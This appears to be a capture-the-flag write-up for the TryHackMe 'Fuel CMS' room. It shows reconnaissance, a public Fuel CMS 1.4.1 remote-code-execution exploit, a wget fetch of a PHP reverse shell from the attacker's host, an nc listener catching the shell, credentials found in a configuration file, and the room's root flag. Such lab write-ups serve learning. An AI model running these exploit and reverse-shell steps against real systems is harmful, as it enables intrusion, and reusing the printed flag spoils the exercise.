Category: CTF
Posted at: Jan 28, 2024
2 Minutes Read
We will go through the step-by-step process of solving the TryHackMe room titled "Fuel CMS."
Let's dive right in!
Nmap scan report for 10.10.42.50
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
The Nmap scan revealed that port 80 is open, running an Apache web server on an Ubuntu machine.
User-agent: *
Disallow: /fuel/
When I visited it, I was redirected to a login page. Using the identified CMS information, I searched for exploits related to Fuel CMS:
$ searchsploit Fuel
Fuel CMS 1.4.1 - Remote Code Execution (3) php/webapps/50477.py
$ searchsploit -m 50477
$ python3 50477.py -u http://10.10.42.50/
[+]Connecting...
Enter Command $pwd
system/var/www/html
I tried different commands in different languages to get a reverse shell but I had no success, so I downloaded a PHP reverse shell from my local machine and accessed it via the browser wget 10.8.5.105/rev.php
$ nc -lnvp 8888 listening on [any] 8888 ... connect to [10.8.105.5] from (UNKNOWN) [10.10.42.50] 37380 Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 12:52:32 up 17 min, 0 users, load average: 1.05, 0.86, 0.56 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off
www-data@ubuntu:/home/www-data$ cat flag.txt
6470****************************
While exploring further, I found credentials in the database.php file:
'username' => 'root',
'password' => 'mememe',
Armed with the root user credentials, I successfully logged in as the root user and located the root flag:
root@ubuntu:~# cat root.txt
b9bbcb33e11b80be759c4e844862482d